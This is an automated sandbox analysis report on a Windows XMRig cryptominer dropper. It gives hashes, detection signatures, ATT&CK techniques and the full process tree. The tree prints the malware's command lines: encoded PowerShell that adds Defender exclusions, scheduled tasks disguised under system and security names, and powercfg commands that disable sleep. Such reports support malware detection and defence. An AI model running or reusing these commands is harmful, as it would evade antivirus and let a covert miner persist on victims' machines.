xmrig | 30e247fa55281ed316ecf128283d7adb0d5e901f8583c9bfdb8507ad5fb7c1d5

Analysis

max time kernel
150s
max time network
148s
platform
windows10-2004_x64
resource
win10v2004-20230220-en
resource tags

arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system
submitted
13/03/2023, 09:07

Sharing

Copy URL Twitter E-mail

Report Analysis Logs

General

Target

0ulcoge8o7w.exe
Size

1.0MB
MD5

99a72b6b4f4220bd335599679e22862a
SHA1

e0e3fcd12f597a7362fc4d5ea38bb25968c25080
SHA256

30e247fa55281ed316ecf128283d7adb0d5e901f8583c9bfdb8507ad5fb7c1d5
SHA512

104731530334821bd1258a9e4ca7dba0c81095ba9f4da3dadae981fa290711ddfb1010429337c8ee27db3fccc4542f5f5fbd1e23099ed783ed3e632b37966499
SSDEEP

12288:yjctdV78F9Fw+bXjzXgbJj/oc2Puc9bC:y8Lmw+bXjzXgbx

Score

10^/10

xmrig miner

Malware Config

Signatures

xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
miner xmrig

XMRig Miner payload 9 IoCs

miner

resource	yara_rule
behavioral2/files/0x0006000000023179-323.dat	xmrig
behavioral2/memory/1240-327-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-328-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-330-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-332-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-333-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-334-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-335-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig
behavioral2/memory/1240-336-0x0000000000400000-0x0000000000EFC000-memory.dmp	xmrig

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	RegSvcs.exe

Executes dropped EXE 2 IoCs

pid	Process
2220	dllhost.exe
1240	winlogson.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 3520 set thread context of 2788	3520	0ulcoge8o7w.exe	86

Program crash 1 IoCs

pid	pid_target	Process	procid_target
3044	3520	WerFault.exe	85

Creates scheduled task(s) 1 TTPs 9 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
1132	schtasks.exe
3396	schtasks.exe
964	schtasks.exe
1184	schtasks.exe
3092	schtasks.exe
3872	schtasks.exe
1672	schtasks.exe
1968	schtasks.exe
1444	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2788	RegSvcs.exe
4300	powershell.exe
4300	powershell.exe
1588	powershell.exe
1588	powershell.exe
3476	powershell.exe
3476	powershell.exe
3536	powershell.exe
3536	powershell.exe
2792	powershell.exe
2792	powershell.exe
3040	powershell.exe
3040	powershell.exe
1588	powershell.exe
3536	powershell.exe
3476	powershell.exe
3040	powershell.exe
2792	powershell.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe
2220	dllhost.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
664	Process not Found

Suspicious use of AdjustPrivilegeToken 22 IoCs

description	pid	Process
Token: SeDebugPrivilege	2788	RegSvcs.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeShutdownPrivilege	3124	powercfg.exe
Token: SeCreatePagefilePrivilege	3124	powercfg.exe
Token: SeDebugPrivilege	1588	powershell.exe
Token: SeShutdownPrivilege	4876	powercfg.exe
Token: SeCreatePagefilePrivilege	4876	powercfg.exe
Token: SeDebugPrivilege	3476	powershell.exe
Token: SeDebugPrivilege	3536	powershell.exe
Token: SeDebugPrivilege	2792	powershell.exe
Token: SeDebugPrivilege	3040	powershell.exe
Token: SeShutdownPrivilege	4284	powercfg.exe
Token: SeCreatePagefilePrivilege	4284	powercfg.exe
Token: SeShutdownPrivilege	3440	powercfg.exe
Token: SeCreatePagefilePrivilege	3440	powercfg.exe
Token: SeShutdownPrivilege	1884	powercfg.exe
Token: SeCreatePagefilePrivilege	1884	powercfg.exe
Token: SeShutdownPrivilege	1884	powercfg.exe
Token: SeCreatePagefilePrivilege	1884	powercfg.exe
Token: SeDebugPrivilege	2220	dllhost.exe
Token: SeLockMemoryPrivilege	1240	winlogson.exe
Token: SeLockMemoryPrivilege	1240	winlogson.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
1240	winlogson.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3520 wrote to memory of 2788	3520	0ulcoge8o7w.exe	86
PID 3520 wrote to memory of 2788	3520	0ulcoge8o7w.exe	86
PID 3520 wrote to memory of 2788	3520	0ulcoge8o7w.exe	86
PID 3520 wrote to memory of 2788	3520	0ulcoge8o7w.exe	86
PID 3520 wrote to memory of 2788	3520	0ulcoge8o7w.exe	86
PID 2788 wrote to memory of 1700	2788	RegSvcs.exe	89
PID 2788 wrote to memory of 1700	2788	RegSvcs.exe	89
PID 2788 wrote to memory of 1700	2788	RegSvcs.exe	89
PID 1700 wrote to memory of 4300	1700	cmd.exe	91
PID 1700 wrote to memory of 4300	1700	cmd.exe	91
PID 1700 wrote to memory of 4300	1700	cmd.exe	91
PID 2788 wrote to memory of 2220	2788	RegSvcs.exe	103
PID 2788 wrote to memory of 2220	2788	RegSvcs.exe	103
PID 2788 wrote to memory of 2220	2788	RegSvcs.exe	103
PID 2788 wrote to memory of 4400	2788	RegSvcs.exe	131
PID 2788 wrote to memory of 4400	2788	RegSvcs.exe	131
PID 2788 wrote to memory of 4400	2788	RegSvcs.exe	131
PID 2788 wrote to memory of 796	2788	RegSvcs.exe	130
PID 2788 wrote to memory of 796	2788	RegSvcs.exe	130
PID 2788 wrote to memory of 796	2788	RegSvcs.exe	130
PID 2788 wrote to memory of 4884	2788	RegSvcs.exe	129
PID 2788 wrote to memory of 4884	2788	RegSvcs.exe	129
PID 2788 wrote to memory of 4884	2788	RegSvcs.exe	129
PID 2788 wrote to memory of 4296	2788	RegSvcs.exe	128
PID 2788 wrote to memory of 4296	2788	RegSvcs.exe	128
PID 2788 wrote to memory of 4296	2788	RegSvcs.exe	128
PID 2788 wrote to memory of 2296	2788	RegSvcs.exe	127
PID 2788 wrote to memory of 2296	2788	RegSvcs.exe	127
PID 2788 wrote to memory of 2296	2788	RegSvcs.exe	127
PID 2788 wrote to memory of 2384	2788	RegSvcs.exe	126
PID 2788 wrote to memory of 2384	2788	RegSvcs.exe	126
PID 2788 wrote to memory of 2384	2788	RegSvcs.exe	126
PID 2788 wrote to memory of 1324	2788	RegSvcs.exe	125
PID 2788 wrote to memory of 1324	2788	RegSvcs.exe	125
PID 2788 wrote to memory of 1324	2788	RegSvcs.exe	125
PID 2788 wrote to memory of 4384	2788	RegSvcs.exe	124
PID 2788 wrote to memory of 4384	2788	RegSvcs.exe	124
PID 2788 wrote to memory of 4384	2788	RegSvcs.exe	124
PID 2788 wrote to memory of 2656	2788	RegSvcs.exe	123
PID 2788 wrote to memory of 2656	2788	RegSvcs.exe	123
PID 2788 wrote to memory of 2656	2788	RegSvcs.exe	123
PID 2788 wrote to memory of 2724	2788	RegSvcs.exe	122
PID 2788 wrote to memory of 2724	2788	RegSvcs.exe	122
PID 2788 wrote to memory of 2724	2788	RegSvcs.exe	122
PID 2788 wrote to memory of 3424	2788	RegSvcs.exe	121
PID 2788 wrote to memory of 3424	2788	RegSvcs.exe	121
PID 2788 wrote to memory of 3424	2788	RegSvcs.exe	121
PID 2788 wrote to memory of 1032	2788	RegSvcs.exe	120
PID 2788 wrote to memory of 1032	2788	RegSvcs.exe	120
PID 2788 wrote to memory of 1032	2788	RegSvcs.exe	120
PID 2788 wrote to memory of 2408	2788	RegSvcs.exe	119
PID 2788 wrote to memory of 2408	2788	RegSvcs.exe	119
PID 2788 wrote to memory of 2408	2788	RegSvcs.exe	119
PID 2788 wrote to memory of 2336	2788	RegSvcs.exe	118
PID 2788 wrote to memory of 2336	2788	RegSvcs.exe	118
PID 2788 wrote to memory of 2336	2788	RegSvcs.exe	118
PID 3424 wrote to memory of 2792	3424	cmd.exe	132
PID 3424 wrote to memory of 2792	3424	cmd.exe	132
PID 3424 wrote to memory of 2792	3424	cmd.exe	132
PID 1324 wrote to memory of 1444	1324	cmd.exe	133
PID 1324 wrote to memory of 1444	1324	cmd.exe	133
PID 1324 wrote to memory of 1444	1324	cmd.exe	133
PID 1032 wrote to memory of 1588	1032	cmd.exe	135
PID 1032 wrote to memory of 1588	1032	cmd.exe	135

C:\Users\Admin\AppData\Local\Temp\0ulcoge8o7w.exe
"C:\Users\Admin\AppData\Local\Temp\0ulcoge8o7w.exe"
1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3520
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
  2⤵
  - Drops file in Drivers directory
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2788
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAGkAbwBoAFgAdgB5AEYAQwByADgAdQBMADgAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAOABlAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMASABkAEYANgBMAEoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATgB5AHIAbwA4AGQAWgAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1700
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAGkAbwBoAFgAdgB5AEYAQwByADgAdQBMADgAdQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHMAOABlAFMAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMASABkAEYANgBMAEoAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMATgB5AHIAbwA4AGQAWgAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:4300
- - C:\ProgramData\Dllhost\dllhost.exe
    "C:\ProgramData\Dllhost\dllhost.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2220
  - - C:\Windows\SysWOW64\cmd.exe
      "cmd.exe" /c chcp 1251 & C:\ProgramData\Dllhost\winlogson.exe -c config.json
      4⤵
      PID:2232
    - - C:\Windows\SysWOW64\chcp.com
        
        chcp 1251
        5⤵
        
        PID:4796
    - - C:\ProgramData\Dllhost\winlogson.exe
        
        C:\ProgramData\Dllhost\winlogson.exe -c config.json
        5⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:1240
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off & echo тpяk & SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo LнъDUvБdО3GOшШeкй1
    3⤵
    PID:2336
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3124
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -hibernate-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4876
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-ac 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:4284
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /x -standby-timeout-dc 0
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3440
  - - C:\Windows\SysWOW64\powercfg.exe
      powercfg /hibernate off
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1884
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC MINUTE /MO 5 /TN "ActivationRule" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1184
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAG4AawApBGUAdQBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAA+BEMAeQBPBDAEEAREBGsALgREADIAaAAnBEIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjABMEeQBQAHQASABoAE8ATwAuBCAEIwA+ACAAQAAoACAAPAAjADEAaABFAEIAYQArBDEELgQmBHQAOgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAQgQ4AGgAUQB6AD4EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACIEWQAgBDcAYgAkBCoEEAQ4BG0ATwAbBHoAHQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA0AD0EKgQaBEMARQRPACEENQA1AEoAKwQwBE0EIwA+AA=="
    3⤵
    PID:2408
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAG4AawApBGUAdQBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAdAA+BEMAeQBPBDAEEAREBGsALgREADIAaAAnBEIAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjABMEeQBQAHQASABoAE8ATwAuBCAEIwA+ACAAQAAoACAAPAAjADEAaABFAEIAYQArBDEELgQmBHQAOgQjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAQgQ4AGgAUQB6AD4EIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACIEWQAgBDcAYgAkBCoEEAQ4BG0ATwAbBHoAHQQjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA0AD0EKgQaBEMARQRPACEENQA1AEoAKwQwBE0EIwA+AA=="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3536
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAC4EWQBLBB0ESQQoBEYAMgQRBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBJBDMASgA+BBMEMwBCBGoAUABGACUEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAB4EPgR1ADEAPQREBDQEWQAxBCMAPgAgAEAAKAAgADwAIwBGAFoATQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAAwBBEEOgRBADYERgQWBDgAOgR6AFEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGYANQRyAGgARwB2AB8EOAR0AFkAVgBCBGMAUAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA7BDEAeQAfBFEAZAAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1032
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAC4EWQBLBB0ESQQoBEYAMgQRBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAVgBJBDMASgA+BBMEMwBCBGoAUABGACUEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjAB4EPgR1ADEAPQREBDQEWQAxBCMAPgAgAEAAKAAgADwAIwBGAFoATQAjAD4AIAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAIAA8ACMAbAAwBBEEOgRBADYERgQWBDgAOgR6AFEAIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjAGYANQRyAGgARwB2AB8EOAR0AFkAVgBCBGMAUAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwA7BDEAeQAfBFEAZAAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1588
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjACsEOQQ1BE4EGgQ0BCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQB1AHUATwAgBBMEcgBrADkASgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAeAAdBDYATwQ8BCYEFgRwACMAPgAgAEAAKAAgADwAIwBQAGwAegBHBFIAdgBOACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAQBG0AagA3ABUEeABPBHAAGwRDBE0AcgA7BCEEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACYEWQA8BFUAHwR2AB0EGgQXBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEcATABmABgEOAAsBEIEOABGAEIAVwAjAD4A"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3424
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjACsEOQQ1BE4EGgQ0BCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAcQB1AHUATwAgBBMEcgBrADkASgQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAeAAdBDYATwQ8BCYEFgRwACMAPgAgAEAAKAAgADwAIwBQAGwAegBHBFIAdgBOACMAPgAgACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAgADwAIwAQBG0AagA3ABUEeABPBHAAGwRDBE0AcgA7BCEEIwA+ACAAJABlAG4AdgA6AFAAcgBvAGcAcgBhAG0ARABhAHQAYQApACAAPAAjACYEWQA8BFUAHwR2AB0EGgQXBCMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAEcATABmABgEOAAsBEIEOABGAEIAVwAjAD4A"
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2792
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjACgEZwARBB0EVwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFkATQQ4AHIAGQREBDoEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADAEFwRIAHAAKwQqBCoEEQRFADwETARJBCMAPgAgAEAAKAAgADwAIwA1ACAENABwAFoAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEAEMgRJABgEGgREBG8AaQB3AFQAbgAzBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBEAFAANgQZBFQAQAQXBEYAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwApBEoAaQAlBHkAJwQVBGUAYwBRAB8EIAR1ACMAPgA="
    3⤵
    PID:2724
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjACgEZwARBB0EVwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAFkATQQ4AHIAGQREBDoEIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAPAAjADAEFwRIAHAAKwQqBCoEEQRFADwETARJBCMAPgAgAEAAKAAgADwAIwA1ACAENABwAFoAIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjAEAEMgRJABgEGgREBG8AaQB3AFQAbgAzBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBEAFAANgQZBFQAQAQXBEYAMwAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwApBEoAaQAlBHkAJwQVBGUAYwBRAB8EIAR1ACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3040
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C powershell -EncodedCommand "PAAjAHcARwBCAFEANgASBGgAVwAiBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMwQiBE0EQQRCBHIAcABIBGMAJQQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMgB2ACcEGgQlBG4AVgAjAD4AIABAACgAIAA8ACMARwQlBDkEEQQfBE0AIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADEENABqAB8EawAoBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBaAFAAIQRJBCwEOgQ2ACsEKgRGAEsAdAAZBGwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANwRABCYETwRrACMAPgA="
    3⤵
    PID:2656
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      powershell -EncodedCommand "PAAjAHcARwBCAFEANgASBGgAVwAiBCMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAMwQiBE0EQQRCBHIAcABIBGMAJQQjAD4AIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAYQB0AGgAIAA8ACMAMgB2ACcEGgQlBG4AVgAjAD4AIABAACgAIAA8ACMARwQlBDkEEQQfBE0AIwA+ACAAJABlAG4AdgA6AFUAcwBlAHIAUAByAG8AZgBpAGwAZQAsACAAPAAjADEENABqAB8EawAoBCMAPgAgACQAZQBuAHYAOgBQAHIAbwBnAHIAYQBtAEQAYQB0AGEAKQAgADwAIwBaAFAAIQRJBCwEOgQ2ACsEKgRGAEsAdAAZBGwAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMANwRABCYETwRrACMAPgA="
      4⤵
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:3476
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo фNzЩсhЕаЛжBУn29зМНн & SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo ryРeАЭDяDыТXIo
    3⤵
    PID:4384
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "NvStray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3092
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo Д & SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo У
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1324
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "OneDriveService" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1444
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo & SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo лэKоФNkmwJ
    3⤵
    PID:2384
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "MicrosoftEdgeUpd" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3396
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo 8кРxaPВксП9elrй6 & SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo
    3⤵
    PID:2296
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "dllhost" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1132
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo XоrыгмГyзБdЮЗ & SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo W
    3⤵
    PID:4296
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "AntiMalwareServiceExecutable" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:3872
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo Ъ & SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo a
    3⤵
    PID:4884
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WmiPrvSE" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1968
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo Nlь & SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo sЕ
    3⤵
    PID:796
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "WindowsDefender" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:964
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C echo врwПAQшfьДJЩРwш & SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f & echo Iж
    3⤵
    PID:4400
  - - C:\Windows\SysWOW64\schtasks.exe
      SCHTASKS /CREATE /SC HOURLY /TN "SecurityHealthSystray" /TR "C:\ProgramData\Dllhost\dllhost.exe" /f
      4⤵
      Creates scheduled task(s)
      PID:1672
- C:\Windows\SysWOW64\WerFault.exe
  C:\Windows\SysWOW64\WerFault.exe -u -p 3520 -s 252
  2⤵
  - Program crash
  PID:3044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 3520 -ip 3520
1⤵
PID:4912

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Web Service

T1102

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Dllhost\dllhost.exe

Filesize
62KB

MD5
e72d497c94bb1ed882ac98931f70e82e

SHA1
85c2c44e4addbdde87b49b33e252772126f9544e

SHA256
d2e371810e8c7b1e039a02a578b1af0c6250665e85206b97a1ecb71aa5568443

SHA512
